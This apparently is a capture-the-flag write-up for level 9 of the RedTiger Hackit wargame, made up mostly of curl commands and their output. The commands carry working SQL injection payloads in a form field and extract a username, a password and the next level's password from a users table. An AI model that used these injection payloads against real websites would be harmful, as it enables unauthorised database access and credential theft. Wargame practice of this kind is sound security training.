# RedTigers Hackit wargame: Level 9


# curl --silent --insecure --cookie-jar level9 --cookie level9 --request POST --data "password=736c61705f7468655f6c616d65727a&level9login=Login" https://redtiger.dyndns.org/hackit/level9.php
                <b>Welcome to Level 9</b><br><br>
                Target: Get username and password of any user. Tablename: level9_users<br>
                Its not a blind. There is a way to get an output :) <br>
                <br><br>
        Autor: RedTiger <br>Title: Lorem ipsum <br>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. <br><br>                     <form method="POST">
                                Name: <input type="text" name="autor"> <br>
                                Title: <input type="text" name="title"><br>
                                <textarea name="text"></textarea>
                                <input type="submit" name="post">
                        </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(username, $[14-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(password,$[146-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(username),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(password),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='),((select username from level9_users limit 1),(select password from level9_users limit 1),'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | sed 's/<br>/\n/g' | grep -A 1 Autor
Autor: RedTiger
Title: Lorem ipsum
--
Autor:
Title:
--
Autor: 546865426c7565466c6f776572
Title: 212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "user=546865426c7565466c6f776572&password=253231253246666c6f776572703239253344253235643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f753733343935383337343935383734253234253235254137253235253236254137253234253236254137253234253235253236253231254137253234253235444653414446415344465344313334353334353132333472356173644651574525323525413725323425323644466173646661733233343536&login=Login" https://redtiger.dyndns.org/hackit/level9.php | grep is:
<br>The password for the next level is: <b>646f6e745f7468726f775f73746f6e6573</b> <br><br>

1 comment:

Anonymous said...

why are you so stupid that you need to public this?